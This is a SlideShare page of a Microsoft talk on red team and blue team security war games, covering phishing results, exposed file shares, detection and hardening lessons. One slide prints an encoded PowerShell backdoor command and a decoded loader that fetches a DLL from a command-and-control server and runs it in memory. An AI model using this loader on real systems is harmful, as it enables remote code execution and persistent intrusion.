Uploaded bySeniorStoryteller
PPTX, PDF1,198 views

Security War Games

The document discusses security war games and red team/blue team exercises. It provides examples of red team techniques like exploiting unprotected file shares and spear phishing attacks. It also gives examples of blue team detection methods like discovering backdoor command and control servers and tracking attack progression. The document emphasizes that these exercises help measure security, identify gaps, and improve incident response procedures. Running such games establishes baselines and frameworks to inventory damage and identify security investments needed to reduce the time to detect, contain, and recover from attacks.

Technology
Related topics:
Red Team Blue Team

Embed presentation

Downloaded 57 times
Sam Guckenheimer Microsoft @samguckenheimer . Security War Games photo: Maryam Rahmania/UPI. http://www.readingthepictures.org/2011/10/war-games/
WhereIWork…. 2 Visual Studio Team Services is SaaS hosted on Azure
“FUNDAMENTALLY, IF SOMEBODY WANTS TO GET IN, THEY'RE GETTING IN…ACCEPT THAT. WHAT WE TELL CLIENTS IS: NUMBER ONE, YOU'RE IN THE FIGHT, WHETHER YOU THOUGHT YOU WERE OR NOT. NUMBER TWO, YOU ALMOST CERTAINLY ARE PENETRATED. ” Michael Hayden Former Director of NSA & CIA MindsetShift:AssumeBreach 3
RedTeamvs.BlueTeam 4  Double blind test  Full disclosure at or near end vs.  Share tactics & lessons learned  Continued evolution
Wargames 5 Exercise ability to respond  Like a fire drill vs. a real fire  Standardized operating procedures & improve response  Reduce Mean Time To Detection (MTTD)  Reduce Mean Time To Recovery (MTTR) Example scenarios  Service compromise  Inside attacker  Remote code execution  Malware outbreak  Customer data compromised  Denial of service Procedures  Attack scenario  Incident response process  Post-mortem
RedTeaming 6  Model emerging threats & use blended threats  Pivot laterally & penetrate deeper  Exfiltrate & leverage compromised data  Escape & Evade / Persistence  Measures Time to Compromise (MTTC) / Pwnage (MTTP)  Highlight security monitoring & recovery gaps  Improves incident response tools & process  Prove need for Assume Breach  Enumerate business risks  Justify resources, priorities, & investment needs Model real-world attacks Identify gaps in security story Demonstrable impact
BlueTeaming 7  Detect attack & penetration (MTTD)  Respond & recover to attack & penetration (MTTR)  Practiced incident response  Produces actionable intelligence  Full visibility into actual conditions within environment  Data analysis & forensics for attack & breach indicators  Accurately assesses real- world attacks  Identifies gaps & investment needs  Focus on slowing down attackers & speeding recovery  Hardening that prevents future attacks Exercises ability to detect & respond Enhances situational awareness Measures readiness & impact
AssumeBreachExecution 8 Wargame exercises Blue teaming Red teaming Monitor emerging threats Execute post breach Insider attack simulation
Red Team Examples Recon Delivery Foothold Persist Move Elevate Exfiltrate
What does an unprotected file share look like? Dolor sit amet Unprotectedfileshares
First Campaign • Team member’s workstation • Contained secrets for • ●●● PROD • ●●● PROD • Including: • RDP access to VMs • Config DB passwords • etc. Second Campaign • Unprotected file share • ●●● ●●● passwords.txt • Contained passwords for CORP accounts • ●●● ●●● • ●●●● ●●●● • (just “QA” or “test” or “internal” accounts) Unprotectedfileshares
Who is an administrator on your workstation or laptop? Localadministratoraccounts (Use compmgmt.msc to invoke the tool) Or from the cmd line: net localgroup administrators Scanned for • What machines are on Corpnet • Find admin on each machine • Log onto their machines and: • Steal product source code if present on disk • Install malware on their machines (like a keylogger) • Use malware to steal passwords (before Windows10) • Use passwords or pass-the-hash to move laterally • Before multi-factor authentication across domains • Find password reuse or misconfigured groups on PROD
Phishing Lumia 1820 Offer Phishingattack MICROSOFT CONFIDENTIAL • Total population of 524 people. • 220 people clicked on signup button. 37 people clicked on other phishing emails • Only 11 people reported to CSIRP
Spear-phishingattack
Footnote:Office365Now One click to report email as suspicious
Blue Team Examples Gather Detect Alert Triage Context Plan Execute
MICROSOFT CONFIDENTIAL Communications Unlike the Red Team who shared a room – the Blue Team were distributed across multiple time zones. As an experiment, a dedicated private Yammer group was created to share information and coordinate efforts. Benefits • Focused: Discussions not intermingled with unrelated email • Threaded conversations • Central (and secured) file sharing • Real-time notifications
TrackingAttackProgression
DiscoveringBackdoorC2Servers Red Team have established persistent remote access to compromised servers powershell.exe -ExecutionPolicy bypass -EncodedCommand JABkAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AGQAWQBGA EYAeABKAFMAZwB1ADkAeQBPAGsASgBEAEUAeQBrAGsASwBKAEIAZQA3AHgAQQBmAEYAagBNAEUAOQ AAAIAAgACAAIAAgACQAcwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQ..etc Blue Team discovered evidence of backdoor malware communicating to Command & Control (C2) servers on https://<ipaddress>:4433 Which decodes to a PowerShell function similar to the following: Function Get-SecureFile { <# .SYNOPSIS Gets a file securely .EXAMPLE Get-SecureFile -ServerAddress "http://123.123.123.123:30000" –File "ZombieBytes.dll" #> ... [Byte[]]$Bytes = Get-SecureFile -ServerAddress "https://<ipaddress>:4433" - CertThumbprint "CA81997XX" -File "FootInZombie.dll" [Reflection.Assembly]::Load($Bytes) [FootInZombie.Program]::Main($Args)
• Use Just-in-time administration (PowerShell JustEnoughAdmin) • Use Multi-Factor Authentication even across internal domains • Manage & Rotate Secrets (e.g. Azure KeyVault) • Upgrade to latest OS versions (e.g. Windows 10) & patch diligently • Use DevOps Release Pipeline and cadence to contain damage • Destroy compromised instances • Deploy containment and fix • Do not tip your hand to the attackers • Segregate domains and do not dual-home servers • Use different passwords if you have user accounts in more than one domain • Limit use of open file shares in general; instead add just the users who need access • Absolutely do not put passwords on open file shares • Only you should be administrator on your laptop or workstation • Think before blindly clicking on links in e-mail, and check the links to make sure they are legitimate FromtheRetrospecties
RunWarGamesinorderto 21 Establish security baselines  Time to detect  Time to contain  Time to fix  Time to recover Framework to inventory damage Identify reactive security investments Update response plans If you measure MTTR in WEEKS/MONTHS/YEARS instead of hours/days, LEARN and IMPROVE! Acknowledgements: John Walton (Office 365, Azure) Grant Holliday, Chandra Achalla (VSTS)
Thank You @samguckenheimer http: //aka.ms/devops http: //visualstudio.com

More Related Content

PPTX
Detection Rules Coverage
bySunny Neo
 
PDF
BlueHat v18 || Improving security posture through increased agility with meas...
byBlueHat Security Conference
 
PDF
There’s an OpenBullet Attack Config for Your Site – What Should You Do?
byDevOps.com
 
PDF
Building Security Controls around Attack Models
bySeniorStoryteller
 
PPTX
Purple team is awesome
bySumedt Jitpukdebodin
 
PDF
Red team-view-gaps-in-the-serverless-application-attack-surface
byPriyanka Aash
 
PPTX
Rugged DevOps at Scale with Rich Mogull
bySeniorStoryteller
 
PDF
How to adapt the SDLC to the era of DevSecOps
byZane Lackey
 
Detection Rules Coverage
bySunny Neo
 
BlueHat v18 || Improving security posture through increased agility with meas...
byBlueHat Security Conference
 
There’s an OpenBullet Attack Config for Your Site – What Should You Do?
byDevOps.com
 
Building Security Controls around Attack Models
bySeniorStoryteller
 
Purple team is awesome
bySumedt Jitpukdebodin
 
Red team-view-gaps-in-the-serverless-application-attack-surface
byPriyanka Aash
 
Rugged DevOps at Scale with Rich Mogull
bySeniorStoryteller
 
How to adapt the SDLC to the era of DevSecOps
byZane Lackey
 

What's hot

PDF
OSCP Preparation Guide @ Infosectrain
byInfosecTrain
 
PDF
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
byBlueHat Security Conference
 
PDF
DevSecOps: What Why and How : Blackhat 2019
byNotSoSecure Global Services
 
PDF
Client-Side Penetration Testing Presentation
byChris Gates
 
PDF
Beyond the mcse red teaming active directory
byPriyanka Aash
 
PDF
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
byFlorian Roth
 
PDF
Red Team vs. Blue Team on AWS
byPriyanka Aash
 
PDF
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
PDF
Enterprise Vulnerability Management - ZeroNights16
byAlexander Leonov
 
PDF
ChaoSlingr: Introducing Security-Based Chaos Testing
byPriyanka Aash
 
PDF
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
byBlueHat Security Conference
 
PDF
Malware collection and analysis
byChong-Kuan Chen
 
PDF
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
byMauricio Velazco
 
PPTX
Locking Down Your Cloud
by2nd Sight Lab
 
PDF
Advanced red teaming all your badges are belong to us
byPriyanka Aash
 
PDF
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
byDiogo Mónica
 
PDF
Effective approaches to web application security
byZane Lackey
 
PDF
Android Application Security
byChong-Kuan Chen
 
PDF
NGINX User Summit. Wallarm llightning talk
byWallarm
 
PDF
Addios!
byChong-Kuan Chen
 
OSCP Preparation Guide @ Infosectrain
byInfosecTrain
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
byBlueHat Security Conference
 
DevSecOps: What Why and How : Blackhat 2019
byNotSoSecure Global Services
 
Client-Side Penetration Testing Presentation
byChris Gates
 
Beyond the mcse red teaming active directory
byPriyanka Aash
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
byFlorian Roth
 
Red Team vs. Blue Team on AWS
byPriyanka Aash
 
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
Enterprise Vulnerability Management - ZeroNights16
byAlexander Leonov
 
ChaoSlingr: Introducing Security-Based Chaos Testing
byPriyanka Aash
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
byBlueHat Security Conference
 
Malware collection and analysis
byChong-Kuan Chen
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
byMauricio Velazco
 
Locking Down Your Cloud
by2nd Sight Lab
 
Advanced red teaming all your badges are belong to us
byPriyanka Aash
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
byDiogo Mónica
 
Effective approaches to web application security
byZane Lackey
 
Android Application Security
byChong-Kuan Chen
 
NGINX User Summit. Wallarm llightning talk
byWallarm
 
Addios!
byChong-Kuan Chen
 

Similar to Security War Games

PDF
Adversary Emulation and Red Team Exercises - EDUCAUSE
byJorge Orchilles
 
PPTX
ISACA GTACS 2018 - Red Teaming for Enterprise
bySaeid Atabaki
 
PDF
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
byShah Sheikh
 
PPTX
Incident Response: Validation, Containment & Forensics
byPriyanka Aash
 
PPTX
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
byJoe Vest
 
PDF
Cyber Defense - How to be prepared to APT
bySimone Onofri
 
PPTX
Hunt for the red DA
byNeil Lines
 
PPTX
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
PPTX
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
byCODE BLUE
 
PDF
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
byUnited Technology Group (UTG)
 
PPTX
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
byJorge Orchilles
 
PPTX
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
byJorge Orchilles
 
PPTX
Adversary Emulation - DerpCon
byJorge Orchilles
 
PPT
Mitigating Malware Presentation Jkd 11 10 08 Aitp
byJoann Davis
 
PPT
Port of seattle security presentation david morris
byEmily2014
 
PDF
Adversary Emulation - Red Team Village - Mayhem 2020
byJorge Orchilles
 
PPTX
Vulnerability Paralysis ISSA Charleston
byChris Nickerson
 
PDF
Behind the Curtain: Exposing Advanced Threats
byCisco Canada
 
PPTX
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
byJohn Bambenek
 
PPTX
Cybersecurity…real world solutions
byErnestStaats
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
byJorge Orchilles
 
ISACA GTACS 2018 - Red Teaming for Enterprise
bySaeid Atabaki
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
byShah Sheikh
 
Incident Response: Validation, Containment & Forensics
byPriyanka Aash
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
byJoe Vest
 
Cyber Defense - How to be prepared to APT
bySimone Onofri
 
Hunt for the red DA
byNeil Lines
 
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
byCODE BLUE
 
CYBERSECURITY: Game Planning for Success lunch and learn event, April 10th
byUnited Technology Group (UTG)
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
byJorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
byJorge Orchilles
 
Adversary Emulation - DerpCon
byJorge Orchilles
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
byJoann Davis
 
Port of seattle security presentation david morris
byEmily2014
 
Adversary Emulation - Red Team Village - Mayhem 2020
byJorge Orchilles
 
Vulnerability Paralysis ISSA Charleston
byChris Nickerson
 
Behind the Curtain: Exposing Advanced Threats
byCisco Canada
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
byJohn Bambenek
 
Cybersecurity…real world solutions
byErnestStaats
 

More from SeniorStoryteller

PPTX
NuGet Package Management Done Right
bySeniorStoryteller
 
PDF
Building Security In - A Tale of Two Stories - Laksh Raghavan
bySeniorStoryteller
 
PPTX
Making Security Agile - Oleg Gryb
bySeniorStoryteller
 
PPTX
The End of Security as We Know It - Shannon Lietz
bySeniorStoryteller
 
PPTX
Culture Hacker: How to Herd CATTs and Inspire Rebels to Change the World! - S...
bySeniorStoryteller
 
PDF
Heroes’ Journey: Learning from Successful DevOps Transformations
bySeniorStoryteller
 
PPTX
Safely Removing the Last Roadblock to Continuous Delivery
bySeniorStoryteller
 
PDF
Ops Happens: DevOps Beyond Deployment - Damon Edwards
bySeniorStoryteller
 
PPTX
Create Rugged Applications: Managing Your Software Supply Chain
bySeniorStoryteller
 
PPTX
Software Supply Chain Automation Removes Roadblocks to Rugged DevOps
bySeniorStoryteller
 
PPTX
Hero's Tookit: Start Your Rugged DevOps Journey with Nexus, Jenkins and Docker
bySeniorStoryteller
 
PPTX
Scaling Rugged DevOps to Thousands of Applications - Panel Discussion
bySeniorStoryteller
 
PDF
Implementing DevOps in a Regulated Environment - DJ Schleen
bySeniorStoryteller
 
PPTX
Where Bits & Bytes Meet Flesh and Blood - Joshua Corman
bySeniorStoryteller
 
PDF
Release Engineering & Rugged DevOps: An Intersection - J. Paul Reed
bySeniorStoryteller
 
PDF
DevSecOps - Building Rugged Software
bySeniorStoryteller
 
PDF
What We Learned from Four Years of Sciencing the Crap Out of DevOps - Nicole ...
bySeniorStoryteller
 
PDF
Requirements Gathering for a Successful Rugged DevOps Implementation - Hasan ...
bySeniorStoryteller
 
PPTX
Rugged DevOps: Aligning Your Team and Your Powers for Success
bySeniorStoryteller
 
PDF
Breaking Bad Equilibruim - John Willis
bySeniorStoryteller
 
NuGet Package Management Done Right
bySeniorStoryteller
 
Building Security In - A Tale of Two Stories - Laksh Raghavan
bySeniorStoryteller
 
Making Security Agile - Oleg Gryb
bySeniorStoryteller
 
The End of Security as We Know It - Shannon Lietz
bySeniorStoryteller
 
Culture Hacker: How to Herd CATTs and Inspire Rebels to Change the World! - S...
bySeniorStoryteller
 
Heroes’ Journey: Learning from Successful DevOps Transformations
bySeniorStoryteller
 
Safely Removing the Last Roadblock to Continuous Delivery
bySeniorStoryteller
 
Ops Happens: DevOps Beyond Deployment - Damon Edwards
bySeniorStoryteller
 
Create Rugged Applications: Managing Your Software Supply Chain
bySeniorStoryteller
 
Software Supply Chain Automation Removes Roadblocks to Rugged DevOps
bySeniorStoryteller
 
Hero's Tookit: Start Your Rugged DevOps Journey with Nexus, Jenkins and Docker
bySeniorStoryteller
 
Scaling Rugged DevOps to Thousands of Applications - Panel Discussion
bySeniorStoryteller
 
Implementing DevOps in a Regulated Environment - DJ Schleen
bySeniorStoryteller
 
Where Bits & Bytes Meet Flesh and Blood - Joshua Corman
bySeniorStoryteller
 
Release Engineering & Rugged DevOps: An Intersection - J. Paul Reed
bySeniorStoryteller
 
DevSecOps - Building Rugged Software
bySeniorStoryteller
 
What We Learned from Four Years of Sciencing the Crap Out of DevOps - Nicole ...
bySeniorStoryteller
 
Requirements Gathering for a Successful Rugged DevOps Implementation - Hasan ...
bySeniorStoryteller
 
Rugged DevOps: Aligning Your Team and Your Powers for Success
bySeniorStoryteller
 
Breaking Bad Equilibruim - John Willis
bySeniorStoryteller
 

Recently uploaded

PPTX
Building Agents in Microsoft Agent Framework.pptx
byUdaiappa Ramachandran
 
PPTX
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
PDF
Workshop on Sustaining & Growing Open Source Communities - GAS2025
bySammy Fung
 
PDF
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
What Is a Private LLM and Why Enterprises Need It
byAivada
 
PPTX
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
PPTX
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
PDF
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
PDF
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
PDF
WCAG Analyzer Tools and Techniques for User-Friendly Websites
byAccessibility Analyzer
 
PDF
AI Powered Document Processing and Data Extraction
byRobert McDermott
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PPTX
communication-skills-with-technology tools
byJaleto Sunkemo
 
PPTX
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
PDF
Day 4 - Access, Deployments, and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
PPTX
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
Building Agents in Microsoft Agent Framework.pptx
byUdaiappa Ramachandran
 
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
Workshop on Sustaining & Growing Open Source Communities - GAS2025
bySammy Fung
 
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
What Is a Private LLM and Why Enterprises Need It
byAivada
 
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
WCAG Analyzer Tools and Techniques for User-Friendly Websites
byAccessibility Analyzer
 
AI Powered Document Processing and Data Extraction
byRobert McDermott
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
communication-skills-with-technology tools
byJaleto Sunkemo
 
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
Day 4 - Access, Deployments, and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 

Security War Games

  • 1.
    Sam Guckenheimer Microsoft @samguckenheimer . SecurityWar Games photo: Maryam Rahmania/UPI. http://www.readingthepictures.org/2011/10/war-games/
  • 2.
    WhereIWork…. 2 Visual Studio TeamServices is SaaS hosted on Azure
  • 3.
    “FUNDAMENTALLY, IF SOMEBODYWANTS TO GET IN, THEY'RE GETTING IN…ACCEPT THAT. WHAT WE TELL CLIENTS IS: NUMBER ONE, YOU'RE IN THE FIGHT, WHETHER YOU THOUGHT YOU WERE OR NOT. NUMBER TWO, YOU ALMOST CERTAINLY ARE PENETRATED. ” Michael Hayden Former Director of NSA & CIA MindsetShift:AssumeBreach 3
  • 4.
    RedTeamvs.BlueTeam 4  Double blindtest  Full disclosure at or near end vs.  Share tactics & lessons learned  Continued evolution
  • 5.
    Wargames 5 Exercise ability torespond  Like a fire drill vs. a real fire  Standardized operating procedures & improve response  Reduce Mean Time To Detection (MTTD)  Reduce Mean Time To Recovery (MTTR) Example scenarios  Service compromise  Inside attacker  Remote code execution  Malware outbreak  Customer data compromised  Denial of service Procedures  Attack scenario  Incident response process  Post-mortem
  • 6.
    RedTeaming 6  Model emergingthreats & use blended threats  Pivot laterally & penetrate deeper  Exfiltrate & leverage compromised data  Escape & Evade / Persistence  Measures Time to Compromise (MTTC) / Pwnage (MTTP)  Highlight security monitoring & recovery gaps  Improves incident response tools & process  Prove need for Assume Breach  Enumerate business risks  Justify resources, priorities, & investment needs Model real-world attacks Identify gaps in security story Demonstrable impact
  • 7.
    BlueTeaming 7  Detect attack& penetration (MTTD)  Respond & recover to attack & penetration (MTTR)  Practiced incident response  Produces actionable intelligence  Full visibility into actual conditions within environment  Data analysis & forensics for attack & breach indicators  Accurately assesses real- world attacks  Identifies gaps & investment needs  Focus on slowing down attackers & speeding recovery  Hardening that prevents future attacks Exercises ability to detect & respond Enhances situational awareness Measures readiness & impact
  • 8.
  • 9.
    Red Team Examples ReconDelivery Foothold Persist Move Elevate Exfiltrate
  • 10.
    What does anunprotected file share look like? Dolor sit amet Unprotectedfileshares
  • 11.
    First Campaign • Teammember’s workstation • Contained secrets for • ●●● PROD • ●●● PROD • Including: • RDP access to VMs • Config DB passwords • etc. Second Campaign • Unprotected file share • ●●● ●●● passwords.txt • Contained passwords for CORP accounts • ●●● ●●● • ●●●● ●●●● • (just “QA” or “test” or “internal” accounts) Unprotectedfileshares
  • 12.
    Who is anadministrator on your workstation or laptop? Localadministratoraccounts (Use compmgmt.msc to invoke the tool) Or from the cmd line: net localgroup administrators Scanned for • What machines are on Corpnet • Find admin on each machine • Log onto their machines and: • Steal product source code if present on disk • Install malware on their machines (like a keylogger) • Use malware to steal passwords (before Windows10) • Use passwords or pass-the-hash to move laterally • Before multi-factor authentication across domains • Find password reuse or misconfigured groups on PROD
  • 13.
    Phishing Lumia 1820 Offer Phishingattack MICROSOFTCONFIDENTIAL • Total population of 524 people. • 220 people clicked on signup button. 37 people clicked on other phishing emails • Only 11 people reported to CSIRP
  • 14.
  • 15.
    Footnote:Office365Now One click toreport email as suspicious
  • 16.
    Blue Team Examples GatherDetect Alert Triage Context Plan Execute
  • 17.
    MICROSOFT CONFIDENTIAL Communications Unlikethe Red Team who shared a room – the Blue Team were distributed across multiple time zones. As an experiment, a dedicated private Yammer group was created to share information and coordinate efforts. Benefits • Focused: Discussions not intermingled with unrelated email • Threaded conversations • Central (and secured) file sharing • Real-time notifications
  • 18.
  • 19.
    DiscoveringBackdoorC2Servers Red Teamhave established persistent remote access to compromised servers powershell.exe -ExecutionPolicy bypass -EncodedCommand JABkAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AGQAWQBGA EYAeABKAFMAZwB1ADkAeQBPAGsASgBEAEUAeQBrAGsASwBKAEIAZQA3AHgAQQBmAEYAagBNAEUAOQ AAAIAAgACAAIAAgACQAcwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQ..etc Blue Team discovered evidence of backdoor malware communicating to Command & Control (C2) servers on https://<ipaddress>:4433 Which decodes to a PowerShell function similar to the following: Function Get-SecureFile { <# .SYNOPSIS Gets a file securely .EXAMPLE Get-SecureFile -ServerAddress "http://123.123.123.123:30000" –File "ZombieBytes.dll" #> ... [Byte[]]$Bytes = Get-SecureFile -ServerAddress "https://<ipaddress>:4433" - CertThumbprint "CA81997XX" -File "FootInZombie.dll" [Reflection.Assembly]::Load($Bytes) [FootInZombie.Program]::Main($Args)
  • 20.
    • Use Just-in-timeadministration (PowerShell JustEnoughAdmin) • Use Multi-Factor Authentication even across internal domains • Manage & Rotate Secrets (e.g. Azure KeyVault) • Upgrade to latest OS versions (e.g. Windows 10) & patch diligently • Use DevOps Release Pipeline and cadence to contain damage • Destroy compromised instances • Deploy containment and fix • Do not tip your hand to the attackers • Segregate domains and do not dual-home servers • Use different passwords if you have user accounts in more than one domain • Limit use of open file shares in general; instead add just the users who need access • Absolutely do not put passwords on open file shares • Only you should be administrator on your laptop or workstation • Think before blindly clicking on links in e-mail, and check the links to make sure they are legitimate FromtheRetrospecties
  • 21.
    RunWarGamesinorderto 21 Establish security baselines Time to detect  Time to contain  Time to fix  Time to recover Framework to inventory damage Identify reactive security investments Update response plans If you measure MTTR in WEEKS/MONTHS/YEARS instead of hours/days, LEARN and IMPROVE! Acknowledgements: John Walton (Office 365, Azure) Grant Holliday, Chandra Achalla (VSTS)
  • 22.

Editor's Notes

  • #6 Response process includes executive, legal, PR, customer response/notification, etc. Exercise and plan end-to-end. Built the paths, processes and relationships across disciplines to ensure read.
  • #7 Measure mean time to compromise (MTTC), privilege escalation/pwnage (MTTP), and exfiltration (MTTE)
  • #13 Some groups cannot be removed. The guidance is that you, and only you, should be an admin on your workstation.